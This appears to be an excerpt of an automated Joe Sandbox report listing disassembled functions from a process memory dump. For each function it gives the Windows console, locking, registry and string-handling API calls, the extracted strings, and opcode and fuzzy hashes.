                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$iswdigit$wcstol
                                        • String ID:
                                        • API String ID: 3841054028-0
                                        • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                        • Instruction ID: 2a25ac5ab0e2ff0fb4accf102f4521f1276134f513d09e0c62e6d60478b72762
                                        • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                        • Instruction Fuzzy Hash: E951B366B0C69291EB64AF2594101B9F6A1FF68B74BC48231DF7D422D4FF3CA652C620
                                        APIs
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4A3687
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7CD48260D), ref: 00007FF7CD4A36A6
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7CD48260D), ref: 00007FF7CD4A36EB
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4A3703
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7CD48260D), ref: 00007FF7CD4A3722
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$Write_get_osfhandle$Mode
                                        • String ID:
                                        • API String ID: 1066134489-0
                                        • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                        • Instruction ID: 022ce2fb92146cd8f8fea4f2fd6e3476d8d3365ed06e4303bfc5bf7ab642500d
                                        • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                        • Instruction Fuzzy Hash: E851B765B0C64297EA246F51A408579F692FF547B4F888435DF2E43790FF3CE6408B20
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$DriveErrorInformationLastTypeVolume
                                        • String ID:
                                        • API String ID: 850181435-0
                                        • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                        • Instruction ID: dbcf1004a4bf246e01c8b7cc3b56b60156aa305da354e0296cba6286dcce7357
                                        • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                        • Instruction Fuzzy Hash: E5415B32608AC1CAE7609F21E8442F9B7A5FB89B94F844125DF5D8BB48EF38D645C720
                                        APIs
                                          • Part of subcall function 00007FF7CD493578: _get_osfhandle.MSVCRT ref: 00007FF7CD493584
                                          • Part of subcall function 00007FF7CD493578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD49359C
                                          • Part of subcall function 00007FF7CD493578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935C3
                                          • Part of subcall function 00007FF7CD493578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935D9
                                          • Part of subcall function 00007FF7CD493578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935ED
                                          • Part of subcall function 00007FF7CD493578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD493602
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD493514
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD493522
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD493541
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD49355E
                                          • Part of subcall function 00007FF7CD4936EC: _get_osfhandle.MSVCRT ref: 00007FF7CD493715
                                          • Part of subcall function 00007FF7CD4936EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7CD493770
                                          • Part of subcall function 00007FF7CD4936EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD493791
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                        • String ID:
                                        • API String ID: 4057327938-0
                                        • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                        • Instruction ID: 45aa16ecfd703868d3956d7e2ccee087d4e00b15fc5e071b2a6107f2468b65ca
                                        • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                        • Instruction Fuzzy Hash: B8317221B0CA4296E750BF669405479F6A6EF89760FD84135DF6E43395FE3CEA048720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                        • String ID: KEYS$LIST$OFF
                                        • API String ID: 411561164-4129271751
                                        • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                        • Instruction ID: 28cd1575d557dd362f7db2d9c961e1dcfadb03c1ce529aa67a9ce272c1ce7969
                                        • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                        • Instruction Fuzzy Hash: 35215E20B0CA02A1FA54BF65E855175F6A1EB947B0FC49231DF3E462E5FE3CDA448720
                                        APIs
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4901C4
                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD4901D6
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD490212
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD490228
                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD49023C
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD490251
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                        • String ID:
                                        • API String ID: 513048808-0
                                        • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                        • Instruction ID: 637f4558c1c8ad42cdff2ac884067e5df75f71654895f4870d3b973f0e642509
                                        • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                        • Instruction Fuzzy Hash: 2121A321B0CA8287E6506FA2A588638FB95FF59776F944134DF2E022D4EF7DA6448720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                        • String ID:
                                        • API String ID: 4104442557-0
                                        • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                        • Instruction ID: 476fa3a789f3fba084f56d0ca9abc6fe02ec12804918e63dfb27762a1a9ff754
                                        • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                        • Instruction Fuzzy Hash: A5113021708F419AEB00EFA5E84816873A4F719768F801A34EF6D46754EF3CD6648350
                                        APIs
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD493584
                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD49359C
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935C3
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935D9
                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935ED
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD493602
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                        • String ID:
                                        • API String ID: 513048808-0
                                        • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                        • Instruction ID: a0e83ec708f9df779452c4f97edfa252efdc57763845094127647c313676558b
                                        • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                        • Instruction Fuzzy Hash: 30118421B0CA4296E6506FA6A458438FA96FB5A774F985330DF3E423D0EE3CEA448710
                                        APIs
                                        • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7CD4A71F9
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD4A720D
                                        • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7CD4A7300
                                          • Part of subcall function 00007FF7CD4A5740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7CD4A75C4,?,?,00000000,00007FF7CD4A6999,?,?,?,?,?,00007FF7CD498C39), ref: 00007FF7CD4A5744
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: OpenSemaphore$CloseErrorHandleLast
                                        • String ID: _p0$wil
                                        • API String ID: 455305043-1814513734
                                        • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                        • Instruction ID: c728b3d51ad5766a7581a9ca2f2f2628d80d4582c1f80afcadaa38c0271c88fa
                                        • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                        • Instruction Fuzzy Hash: 4D61A162B1DA8286EF25FF5594102B9A3A5EF84BA0FD54531DF1E07795FE3CE6008320
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heapiswspacememset$AllocProcess
                                        • String ID: %s
                                        • API String ID: 2401724867-3043279178
                                        • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                        • Instruction ID: 74ba04c0094f2bfe9baa8841812e742bb3bb1e73901e2c647187340274648a04
                                        • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                        • Instruction Fuzzy Hash: DB51A132B0D68285EB61AF12D8546B9B3A1EB49BA4F844035DF6D47694FF3CE641C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswdigit
                                        • String ID: GeToken: (%x) '%s'
                                        • API String ID: 3849470556-1994581435
                                        • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                        • Instruction ID: 72e36a48bb84eaddc38185d121e35f763a2659c3a4269981e8cbe25e57be3e05
                                        • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                        • Instruction Fuzzy Hash: 58517C31B0C64285EB64AF56E848579B7A0BB54BA4F848435DF6D87390FF7EEA40C720
                                        APIs
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD4A9A10
                                        • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4A9994
                                          • Part of subcall function 00007FF7CD4AA73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA77A
                                          • Part of subcall function 00007FF7CD4AA73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA839
                                          • Part of subcall function 00007FF7CD4AA73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA850
                                        • wcsrchr.MSVCRT ref: 00007FF7CD4A9A62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                        • String ID: %s=%s$.
                                        • API String ID: 3242694432-4275322459
                                        • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                        • Instruction ID: 91f21546d2597e50aaf9c33c4106e379e665dd53cd2867a292b791b0bcf4b57c
                                        • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                        • Instruction Fuzzy Hash: 4E417D21B0D68296EA14BF51A4542BAE291AF857B0FC44231DF7D477D5FF7CEA418320
                                        APIs
                                        • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7CD4A54E6
                                        • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7CD4A552E
                                          • Part of subcall function 00007FF7CD4A758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7CD4A6999,?,?,?,?,?,00007FF7CD498C39), ref: 00007FF7CD4A75AE
                                          • Part of subcall function 00007FF7CD4A758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7CD4A6999,?,?,?,?,?,00007FF7CD498C39), ref: 00007FF7CD4A75C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CreateCurrentMutexProcess
                                        • String ID: Local\SM0:%d:%d:%hs$wil$x
                                        • API String ID: 779401067-630742106
                                        • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                        • Instruction ID: 82185c5936d0e782cc1af25605cbc45bf49c7c895eefb2f4400a55c009980537
                                        • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                        • Instruction Fuzzy Hash: 71519332B1CA8292EB21AF55E4007FAE361EF947A4FC44031EF1D4BA59EE3CD6058720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CurrentDirectorytowupper
                                        • String ID: :$:
                                        • API String ID: 238703822-3780739392
                                        • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                        • Instruction ID: 838f5065fb88b935fec654f5c6ea24d0b170ae65f920849ec992666ccb7eec7e
                                        • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                        • Instruction Fuzzy Hash: 3811561270C60085EB25AFA2E409639F6A1EF597A9F858136DF4D07354EF3CD2018718
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                        • API String ID: 3677997916-3870813718
                                        • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                        • Instruction ID: 40ebd625bab0ba1d11caa7e2f9b604cd8f79bd9dc65a776082075eddacdf5be4
                                        • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                        • Instruction Fuzzy Hash: 7511283261CA4196EB109F50E44426AFBA0FB997A4F804225DF9D42B68EF7CD248CB10
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
